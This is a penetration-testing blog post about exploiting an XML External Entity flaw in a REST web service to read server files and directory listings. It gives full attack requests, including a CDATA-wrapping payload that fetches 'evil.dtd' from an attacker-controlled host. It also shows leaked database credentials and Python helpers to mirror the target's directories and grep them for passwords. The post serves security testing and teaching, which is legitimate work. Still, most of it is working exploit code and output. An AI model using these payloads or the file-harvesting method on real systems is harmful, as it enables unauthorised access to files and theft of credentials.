Wednesday, April 29, 2015 At 1:40PM
During a recent penetration test, GDS assessed an interesting RESTful web service that led to the development of a tool for automating the process of exploiting an XXE (XML External Entity) processing vulnerability to exfiltrate data from the compromised system’s file system. In this post we look at a sample web service that creates user accounts in order to demonstrate the usefulness of the tool.
The example request below shows four parameters in the body of the HTTP request:
PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 109

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<user>
<firstname>John</firstname>
<surname>Doe</surname>
<email>[email protected]</email>
<role>admin</role>
</user>
The associated HTTP response contains the id of the created account in addition to the parameters supplied in the request:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 10:57:28 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

{
  "userId": 123,
  "firstname": "John",
  "surname": "Doe",
  "email": "[email protected]",
  "role": "admin"
}
Note that the web service accepts both JSON and XML input, which explains why the response is JSON-encoded even though the request was XML. Supporting multiple data formats is becoming more common, as described in a recent blog post by Antti Rantasaari.
A typical proof of concept for XXE is to retrieve the content of /etc/passwd, but with some XML parsers it is also possible to get directory listings. The following request defines the external entity “xxe” to contain the directory listing for “/etc/tomcat7/”:
PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 233

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/tomcat7/">
]>
<user>
<firstname>John</firstname>
<surname>&xxe;</surname>
<email>[email protected]</email>
<role>admin</role>
</user>
By referencing “&xxe;” in the surname element we should be able to see the directory listing in the response. Here it is:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:04:01 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

{
  "userId": 126,
  "firstname": "John",
  "surname": "Catalina\ncatalina.properties\ncontext.xml\nlogging.properties\npolicy.d\nserver.xml\ntomcat-users.xml\nweb.xml\n",
  "email": "[email protected]",
  "role": "admin"
}
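Because the service echoes the expanded entity back in the JSON “surname” field, turning such a response into a list of directory entries takes only a few lines. The sketch below assumes the response body is valid JSON and that the entity is referenced in the surname element, as in this example; the function name “parse_listing” is hypothetical and is not taken from the script.

```python
import json
from typing import List


def parse_listing(body: str) -> List[str]:
    """Extract directory entries from the JSON echoed back by the web service.

    Assumption: the XXE entity was referenced in the <surname> element, so the
    expanded file:// content ends up in the "surname" field of the response.
    """
    expanded = json.loads(body)["surname"]
    # The listing is newline-separated; drop empty strings such as the one
    # produced by the final "\n".
    return [entry for entry in expanded.split("\n") if entry]


if __name__ == "__main__":
    # Response body modelled on the example above (email field omitted).
    sample = (
        '{"userId": 126, "firstname": "John", '
        '"surname": "Catalina\\ncatalina.properties\\ncontext.xml\\n", '
        '"role": "admin"}'
    )
    print(parse_listing(sample))  # ['Catalina', 'catalina.properties', 'context.xml']
```

Adapting this function to another target mostly means changing which field the entity lands in.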
The tool
Now that we can get directory listings and retrieve files, the logical next step is to automate the process and download as many files as possible. The Python script linked below does exactly this. For example, we can mirror the directory “/etc/tomcat7/”:
# python xxeclient.py /etc/tomcat7/
2015-04-24 16:21:10,650 [INFO ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,668 [INFO ] retrieving /etc/tomcat7/Catalina/
2015-04-24 16:21:10,690 [INFO ] retrieving /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,696 [INFO ] looks like a file: /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,699 [INFO ] saving etc/tomcat7/Catalina/localhost
2015-04-24 16:21:10,700 [INFO ] retrieving /etc/tomcat7/catalina.properties/
2015-04-24 16:21:10,711 [INFO ] looks like a file: /etc/tomcat7/catalina.properties/
2015-04-24 16:21:10,714 [INFO ] saving etc/tomcat7/catalina.properties
2015-04-24 16:21:10,715 [INFO ] retrieving /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO ] looks like a file: /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO ] saving etc/tomcat7/context.xml
[…]
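The recursion visible in this log can be sketched as a depth-first walk. To keep the sketch self-contained and offline, the HTTP round trip is replaced by a hypothetical “fetch” callable (in the real tool this step sends the XXE request and extracts the expanded entity), and a small dictionary stands in for the target's file system. “mirror()”, “looks_like_listing()” and the “depth” limit are illustrative assumptions rather than the script's actual code; the directory test follows the file-name assumption described in the Caveats section.

```python
import re
from typing import Callable, Dict

# Assumed file-name alphabet: alphanumerics, space and $.-_~
# (the hyphen is escaped so it is not read as a character range).
NAME_RE = re.compile(r"[A-Za-z0-9 $.\-_~]+")


def looks_like_listing(content: str) -> bool:
    """Treat non-empty content whose lines all look like file names as a listing."""
    lines = [line for line in content.split("\n") if line]
    return bool(lines) and all(NAME_RE.fullmatch(line) for line in lines)


def mirror(path: str, fetch: Callable[[str], str], saved: Dict[str, str], depth: int = 10) -> None:
    """Retrieve `path`; recurse into listings and store everything else as a file.

    `fetch` is a hypothetical stand-in for "send the XXE request for this path
    and return the expanded entity". `depth` stops runaway recursion when file
    content happens to look like a listing.
    """
    content = fetch(path)
    if depth > 0 and looks_like_listing(content):
        for name in content.split("\n"):
            if name:
                # Child paths get a trailing slash, as in the log above.
                mirror(path + name + "/", fetch, saved, depth - 1)
    else:
        # Store the content under the path without its trailing slash.
        saved[path.rstrip("/")] = content


if __name__ == "__main__":
    # Hypothetical in-memory file system standing in for the target.
    fake_fs = {
        "/etc/tomcat7": "Catalina\ncontext.xml\n",
        "/etc/tomcat7/Catalina": "localhost\n",
        "/etc/tomcat7/Catalina/localhost": "",
        "/etc/tomcat7/context.xml": "<Context>\n</Context>\n",
    }
    saved: Dict[str, str] = {}
    mirror("/etc/tomcat7/", lambda p: fake_fs.get(p.rstrip("/"), ""), saved)
    print(sorted(saved))  # ['/etc/tomcat7/Catalina/localhost', '/etc/tomcat7/context.xml']
```

As in the log, an empty response (here the fake “Catalina/localhost”) ends up saved as a file.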
Now we can grep through the mirrored files to look for passwords and other interesting information. For example, the file “/etc/tomcat7/context.xml” may contain database credentials:
<?xml version="1.0" encoding="UTF-8"?>
<Context>
<Resource name="jdbc/myDB" auth="Container" type="javax.sql.DataSource" username="sqluser" password="password" driverClassName="com.mysql.jdbc.Driver" url="jdbc:mysql://…"/>
</Context>
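Searching the mirrored files needs nothing more than grep (for example grep -rni "password" etc/), but the same search is easy to script if the results should be post-processed. A minimal Python sketch, where the “password\s*=” pattern and the local “etc” directory (taken from the “saving etc/...” lines in the log) are assumptions to adapt:

```python
import os
import re
from typing import Iterator, Tuple

# Illustrative pattern: attribute or property assignments named "password".
PASSWORD_RE = re.compile(r"password\s*=", re.IGNORECASE)


def grep_mirror(root: str, pattern: re.Pattern = PASSWORD_RE) -> Iterator[Tuple[str, int, str]]:
    """Yield (path, line number, line) for every line below `root` matching `pattern`."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            # Mirrored files may not be valid UTF-8; replace undecodable bytes.
            with open(path, encoding="utf-8", errors="replace") as handle:
                for lineno, line in enumerate(handle, start=1):
                    if pattern.search(line):
                        yield path, lineno, line.rstrip("\n")


if __name__ == "__main__":
    # Assumption: the mirrored tree was saved under ./etc, as in the log.
    for path, lineno, line in grep_mirror("etc"):
        print(f"{path}:{lineno}: {line.strip()}")
```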
How it works
The XXE payload used in the above request effectively copies the content of the file into the “<surname>” tag, where it is parsed as XML. As a result, file content that is not well-formed XML (e.g. a file containing unmatched angle brackets) leads to parsing errors. Moreover, the application might ignore unexpected XML tags.
To overcome these limitations, the file content can be encapsulated in a CDATA section (an approach adopted from a presentation by Timothy D. Morgan). The following request declares four parameter entities, and a fifth entity is defined in an external DTD. The file content is loaded into “%file”, “%start” opens a CDATA section and “%end” closes it. Finally, “%dtd” loads a specially crafted DTD file, which defines the entity “xxe” by concatenating “%start”, “%file” and “%end”. The concatenation has to happen in the external DTD because XML does not allow parameter entity references inside markup declarations in the internal subset. The entity “xxe” is then referenced in the “<surname>” tag.
PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 378

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "file:///etc/tomcat7/context.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil.com/evil.dtd">
%dtd;
]>
<user>
<firstname>John</firstname>
<surname>&xxe;</surname>
<email>[email protected]</email>
<role>admin</role>
</user>
This is the resource “evil.dtd” that is loaded from a web server we control:
<!ENTITY xxe "%start;%file;%end;">
The response actually contains the content of the configuration file “/etc/tomcat7/context.xml”.
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:12:43 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

{
  "userId": 127,
  "firstname": "John",
  "surname": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Context>\n<Resource name=\"jdbc/myDB\" auth=\"Container\" type=\"javax.sql.DataSource\" username=\"sqluser\" password=\"password\" driverClassName=\"com.mysql.jdbc.Driver\" url=\"jdbc:mysql://…\"/>\n</Context>",
  "email": "[email protected]",
  "role": "admin"
}
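The effect of the CDATA wrapper can be reproduced locally with Python's standard ElementTree parser. The sketch does not use entities at all: it simply splices a hypothetical file content into the <surname> element, approximating what the entity expansion produces, once as-is and once wrapped in a CDATA section.

```python
import xml.etree.ElementTree as ET

# Hypothetical file content containing an unmatched angle bracket.
FILE_CONTENT = "if (a < b) { return; }"


def parses(document: str) -> bool:
    """Return True if ElementTree accepts the document as well-formed XML."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


def splice(content: str, cdata: bool) -> str:
    """Place content inside <surname>, optionally wrapped in a CDATA section."""
    if cdata:
        content = "<![CDATA[" + content + "]]>"
    return "<user><firstname>John</firstname><surname>" + content + "</surname></user>"


if __name__ == "__main__":
    print(parses(splice(FILE_CONTENT, cdata=False)))  # False: "<" is read as markup
    print(parses(splice(FILE_CONTENT, cdata=True)))   # True: CDATA is plain character data
    surname = ET.fromstring(splice(FILE_CONTENT, cdata=True)).find("surname").text
    print(surname == FILE_CONTENT)  # True: the content comes back unchanged
```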
Caveats
Note that this technique only works if the server processing the XML input is allowed to make outbound connections to our server to fetch the file “evil.dtd”. Additionally, files containing ‘%’ (and in some cases ‘&’) characters, or binary content (e.g. invalid byte sequences, or control characters below 0x20 other than tab, line feed and carriage return), still result in a parsing error. Moreover, the sequence “]]>” causes problems because it terminates the CDATA section prematurely.
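When deciding whether a file is a good candidate for this technique, or why a download failed, the caveats above can be turned into a quick check on the raw bytes. This is a sketch under stated assumptions: the file is expected to be UTF-8, ‘&’ is flagged even though whether it breaks parsing depends on the parser, and the function name “cdata_problems” is hypothetical.

```python
from __future__ import annotations

# XML 1.0 allows only these characters below 0x20.
ALLOWED_CONTROL = {"\t", "\n", "\r"}


def cdata_problems(data: bytes) -> list[str]:
    """List the reasons (from the caveats above) why `data` may not survive the CDATA trick."""
    try:
        # Assumption: the target file is UTF-8 encoded.
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return ["not valid UTF-8"]
    problems = []
    if "%" in text:
        problems.append("contains '%'")
    if "&" in text:
        problems.append("contains '&' (breaks some parsers)")
    if any(ord(ch) < 0x20 and ch not in ALLOWED_CONTROL for ch in text):
        problems.append("contains control characters not allowed in XML")
    if "]]>" in text:
        problems.append("contains ']]>'")
    return problems


if __name__ == "__main__":
    print(cdata_problems(b'<Resource username="sqluser" password="password"/>'))  # []
    print(cdata_problems(b"discount=50%"))  # ["contains '%'"]
```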
In the directory listing, there is no reliable way to distinguish between files and directories. The script assumes that file names only contain alphanumerics, spaces and the following characters: “$.-_~”. Alternatively, we could treat every file as a directory, iterate over its lines and try to download these possible files or subdirectories. However, this would result in too much overhead when encountering large files.
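One way to express the file-name assumption is a regular expression applied to each line of the retrieved content: if every line could be a file name, the content is treated as a directory listing. A minimal sketch, assuming ASCII alphanumerics and treating an empty response as a file (both assumptions, not taken from the script), which also shows why the heuristic is unreliable:

```python
import re

# Assumed file-name alphabet: alphanumerics, space and $.-_~
# (the hyphen is escaped so it is not read as a character range).
FILE_NAME_RE = re.compile(r"[A-Za-z0-9 $.\-_~]+")


def looks_like_listing(content: str) -> bool:
    """Return True if every non-empty line of `content` could be a file name."""
    lines = [line for line in content.split("\n") if line]
    # An empty response gives no evidence of a listing, so treat it as a file.
    return bool(lines) and all(FILE_NAME_RE.fullmatch(line) for line in lines)


if __name__ == "__main__":
    listing = "Catalina\ncatalina.properties\ncontext.xml\ntomcat-users.xml\n"
    print(looks_like_listing(listing))                   # True
    print(looks_like_listing("<Context>\n</Context>\n"))  # False
    # False positive: a file holding only a version string looks like a listing.
    print(looks_like_listing("1.0.0\n"))                 # True
```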
The script is tailored for the above example, but by changing the XML template and the “_parse_response()” method it should be fairly easy to adapt it for another target.
The script is available on GitHub.
Summary
One way to exploit XXE is to download files from the target server. Some parsers also return a directory listing. In this case we can use the presented script to recursively download whole directories. However, there are restrictions on the file content because certain characters can break the XML syntax.
Author: Georg Chalupar
©Aon plc 2023